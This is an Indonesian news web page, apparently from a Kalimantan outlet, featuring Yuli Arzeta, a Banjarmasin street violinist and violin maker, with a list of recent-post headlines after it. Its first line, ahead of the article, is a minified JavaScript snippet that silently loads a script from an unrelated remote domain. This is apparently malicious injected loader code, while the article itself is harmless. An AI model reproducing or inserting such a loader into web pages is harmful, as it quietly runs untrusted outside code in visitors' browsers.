(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Yuli Arzeta, “Violinis Jalanan” yang Mahir Bikin Biola Sendiri


BANJARMASIN, Jari jemarinya lincah bersinkronasi dengan setiap gesekan yang menghasilkan lantunan nada-nada indah. Namanya Yuli Arzeta, pria itu berdiri gagah dengan rompi sasirangan berwarna biru ditemani bioalanya, menghibur para pengunjung yang datang ke festival Harganas di Siring 0 Km, Banjarmasin.

Dari biolanya, ia mengalunkan banyak lagu yang menghibur pengunjung dalam penampilan ala street musician-nya (musisi jalanan). Di mana ia tampil bermain biola seperti tengah mengamen dengan kotak biola yang terbuka di depannya menanti rupiah diletakkan oleh para pengunjung.

“Sebenarnya saya diminta tampil saja (untuk mengisi kegiatan Harganas) tapi saya ajukan ke panitia saya pakai tema street musician. Jadi kalau ada yang ngasih uang, syukur, kalau engga ya tidak apa-apa. Lumayan dapat pemasukan stereo, kanan kiri,” candanya sembari bersantai saat menunggu azan selesai agar ia bisa tampil kembali menghibur pengunjung.

Penampilan ala street musician sendiri sudah melekat dalam dirinya sejak pertengahan 2018 lalu. Ia biasanya sering tampil pada hari Minggu di Siring Menara Pandang untuk mengisi waktu luang.

Berkat main ala street musician ia jadi sering mendapat  ‘penghasilan tambahan’.  “Yang ngasih biasanya lima atau sepuluh ribu. Kadang pernah ada yang sampai 50 sampai 100 ribu. Tapi biasanya hasilnya saya sumbangkan. Kadang ada orang biasanya request juga kalau saya lagi ngamen,” ungkapnya.

Pekerjaan utama Yuli tidak jauh dari biola. Ia menjadi guru les biola dan juga membuat biola. Ia membuat banyak biola dengan ragam rangka yang unik, bahkan ada yang menyerupai gitar. Biola-biola yang ia buat sudah melalang buana dipesan oleh orang-orang hingga ke luar negeri. Untuk biaya pembuatan satu biola biasanya memakan waktu tiga bulan lamanya.

Sekedar diketahui, pemain biola atau violinis (bahasa inggris : Violinist) biasa disebut. Sementara orang yang membuat atau membetulkan alat musik berdawai disebut luthier.

Pria yang sudah berkeluarga ini berbagi kisahnya bahwa ia sudah menyukai dan menggeluti permainan biola ketika ia duduk di bangku sekolah menengah atas pada tahun 2000. Ia berlatih mula-mula dengan biola buatan tangan sendiri, sebab baginya yang masih pemula saat itu, tidaklah perlu alat musik yang mahal untuk berlatih.

Hingga saat ini di sela hobi ‘mengamennya’, Yuli biasanya menerima tawaran bermain biola untuk tampil di cafe atau acara pernikahan. Ia juga mengaku pernah menjadi pemain musik untuk seorang pria yang saat itu ingin menyatakan perasaan cinta kepada pasangannya.  “Jadi saya disuruh main biola, terus si cowok itu nembak si cewek,” kenangnya.

Penampilan Yuli di malam itu disambut meriah oleh tepuk tangan pengunjung yang hadir. Tidak hanya bermain solo, ia juga tampil berduet bersama rekannya yang memainkan alat musik tradisional panting. (mario)

Reporter:Mario
Editor:Bie

Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

5 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

7 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

8 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

9 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

12 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

15 jam ago

This website uses cookies.